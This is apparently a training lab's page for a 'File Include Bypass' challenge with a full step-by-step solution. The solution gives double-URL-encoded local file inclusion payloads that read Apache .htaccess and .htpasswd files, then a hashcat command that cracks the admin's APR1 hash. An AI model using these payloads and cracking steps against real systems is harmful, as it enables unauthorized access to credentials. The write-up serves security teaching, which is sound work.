Avatar

Labs / File Include Bypass

  • Challenge
  • Released 17 Sep 2025

🔍 Can you bypass the file inclusion filters?

This corporate document portal implements dynamic file inclusion with security filters to prevent unauthorized access, but experienced attackers know that basic protections often have weaknesses. 🛡️ The system blocks directory traversal and PHP file inclusion, but what about other sensitive files that might be lurking in the web directory? 💡 Master the art of filter bypass and discover how to extract authentication credentials from protected areas! 🔓

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🔍 File Include Bypass - Complete Solution

Objective: Exploit the Local File Inclusion vulnerability to bypass security filters, extract Apache authentication files, and crack the admin password to obtain the flag.
🔍 Step 1: Explore the Application

Navigate to to access the SecureCorp Document Portal. Notice the URL structure when clicking on different sections:

http:///index.php?page=about
http:///index.php?page=contact
http:///index.php?page=documents

The application uses the page parameter to dynamically include content files based on user input.

🔍 Step 2: Test Security Filters

The application implements security measures to prevent common attacks:

# Directory traversal (blocked)
http:///index.php?page=../etc/passwd
# Result: "Security violation detected!"

# Forward slash (blocked)
http:///index.php?page=admin/test
# Result: "Path traversal not allowed!"

# PHP file inclusion (blocked)
http:///index.php?page=index.php
# Result: "PHP files cannot be included!"
🔍 Step 3: Discover the Admin Directory

The "Admin" link in the navigation points to /admin/. Accessing it directly triggers HTTP Basic Authentication:

http:///admin/
# Result: 401 Unauthorized - requires credentials

This indicates the directory is protected by Apache .htaccess and .htpasswd files.

🔍 Step 4: Bypass Filters with Double URL Encoding

The key vulnerability is that the application performs URL decoding after the security checks. We can bypass the forward slash restriction using double URL encoding:

# Single encoding %2F gets decoded to / before security check (blocked)
# Double encoding %252F gets decoded to %2F, passes security check,
# then gets decoded again to / during file inclusion

# Access .htaccess file
http:///index.php?page=admin%252F.htaccess
🔍 Step 5: Extract Authentication Files

Use the double encoding technique to access both Apache authentication files:

# Extract .htaccess configuration
http:///index.php?page=admin%252F.htaccess

# Extract .htpasswd password file
http:///index.php?page=admin%252F.htpasswd

The .htaccess file reveals the authentication configuration:

AuthType Basic
AuthName "SecureCorp Administrative Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user

The .htpasswd file contains the hashed password:

admin:$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0
🔍 Step 6: Crack the APR1 Hash

The hash format $apr1$ indicates Apache APR1 MD5. Use online tools or command-line utilities to crack it:

# Using online hash crackers like hashkiller.io or crackstation.net
# Or use hashcat/john the ripper:
echo '$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0' > hash.txt
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt

The APR1 hash decodes to: admin1020304050

🔍 Step 7: Access Admin Panel

Use the cracked credentials to access the protected admin area:

Username: admin
Password: admin1020304050

Navigate to http:///admin/ and enter these credentials when prompted by HTTP Basic Authentication.

🔍 Step 8: Retrieve the Flag

After successful authentication, you'll access the SecureCorp Admin Panel. The flag is displayed in the "System Security Token" section:

Flag: admin1020304050
📚 Key Learning Points
  • Local File Inclusion: Understanding how dynamic file inclusion works and its security implications
  • Double URL Encoding: Bypassing security filters that don't account for multiple encoding layers
  • Apache Authentication: How .htaccess and .htpasswd files work for HTTP Basic Authentication
  • APR1 Hash Cracking: Methods for cracking Apache APR1 MD5 password hashes
  • Security Filter Bypass: Systematic approach to identifying and exploiting input validation flaws
🛡️ Security Implications
  • Input Validation: Implement comprehensive input validation that accounts for multiple encoding layers
  • File Access Controls: Use proper file access controls and avoid dynamic file inclusion when possible
  • Strong Passwords: Use strong, unique passwords and modern hashing algorithms
  • Security Headers: Implement security headers to prevent unauthorized file access
  • Regular Security Testing: Conduct regular security assessments to identify LFI vulnerabilities
Real-World Application: This challenge demonstrates common LFI vulnerabilities found in web applications where developers implement basic security filters without considering encoding bypass techniques. Understanding these methods helps both penetration testers identify vulnerabilities and developers implement more robust protections.